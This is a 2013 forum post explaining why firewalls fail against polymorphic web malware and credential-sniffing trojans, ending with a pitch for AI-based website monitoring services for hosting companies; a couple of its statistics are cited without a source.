Author Topic: Web-Malware: Headache for Firewalls  (Read 728 times)


  • Administrator
  • Green Belt
  • ***
  • Posts: 225
  • Karma: +0/-0
Web-Malware: Headache for Firewalls
« on: August 23, 2013, 03:08:09 PM »

What is a Firewall?:

Firewalls are pieces of software loaded onto servers, personal computers, OEM boxes and appliances. The primary job of this piece of software is to monitor the incoming and sometimes outgoing traffic to and from a network, computer, appliance or some other network element. Firewalls are primarily used to enforce a set of rules to increase the security level of an organization. An example of such a rule can be “Do not allow access to a particular port for incoming traffic” or “Do not allow access to a service (like http) from a group of IP addresses” and more.

Are Firewalls any good?:

Yes, a lot of the firewalls available commercially, open-source and others are actually very good at their job. It is a popular misconception that hosting a firewall on a server will afford the owner of the infrastructure or services behind this protective layer of software, to snooze in peace. To an extent this is true. However with the current spate of polymorphic web-malware traversing the Internet today, it is near impossible for traditional Anti-Virus companies and most firewall manufacturers to keep up with the changing tactics of the malicious hackers. Consider the case that in the last year alone, has documented a 100% increase in the incidents of web-based malware affecting various websites, hosters and e-businesses than the previous year. This points clearly to the fact that malware authors are constantly changing their techniques to infect more and more systems on a daily basis. More than 6600 new websites are getting infected with malware every single day.

When are firewalls not effective?:

To cut to the chase, firewalls are not effective in 3 scenarios (for incoming data):

(1) When a firewall cannot inspect enough incoming data to determine whether a stream of information is malicious or not

(2) When a firewall cannot determine the safety of incoming data irrespective of the amount of data being inspected

(3) When a firewall does not have access to incoming data at all

For case (1) malware authors have constantly tried to chop up malware into benign packets of information trying to get them past stateful and stateless firewalls of different kinds. Modern firewalls are actually pretty good at catching this kind of behavior, albeit at the cost of complexity, memory and CPU load. For the purposes of this discussion we shall assume these tradeoffs do not pose a problem.

For case (2) malware authors use easily available toolkits to generate polymorphic code, simply put these toolkits generate millions of different variants of one basic piece of malware. This is very hard to detect. This is where traditional Anti-virus companies bite the dust. Consider for example, sees more than 200,000 samples of web-based malware on an average day.

Many traditional vendors use systems which are based on old technology, computing hashes and signatures of malware after being analyzed by a human expert. This does not scale. It is extremely hard for firewall manufacturers to constantly keep churning out new signatures and update their entire client base. The fact of the matter is, this kind of a signature/hash based approach is always going to lag (in terms of time) behind the actual attacks themselves. What is needed is a proactive, intelligent way to understand never-before-seen attacks. Fortunately, advanced AI techniques, may prove to be a panacea.

For case (3), the firewall must be forgiven for not catching bad incoming data since it has no access to it. We have observed an uptake in “passive credential sniffing trojans”. This kind of malware installs itself on the local computer of an end-client and sniffs for cleartext credentials, such as FTP passwords. Once the login credentials are acquired, these are transferred to automated bots using IRC channels or free email boxes. The automated bots use these credentials to log into the account of the end-client and proceed to infect the entire account. A lot of times these attacks succeed because hosters do not filter ftp/scp traffic through firewalls, for various reasons.

What can you do to increase security?:

As a hoster, you can keep your customer websites safer by taking advantage of new emerging, website “Health Monitoring” solutions. This kind of new technology, based on advanced AI and self-learning mechanisms can scan websites with minimum interruptions, is totally SaaS based and uses advanced machine learning to catch never-before-seen malware. This is a significant break from the way most traditional Anti-Virus software work. Keep in mind, firewalls are important, but they are not enough. Customer sites can get infected inspite of having a firewall. These new technologies, rolled up into 24x7x365 monitoring solutions can detect in near real-time if a customer site gets infected.

Usage of new emerging technology such as on-demand web scanning can help hosting companies identify rogue websites on their networks, protecting their reputation. It can also turn into a golden opportunity to increase recurring revenue and distinguish one’s self from the competition.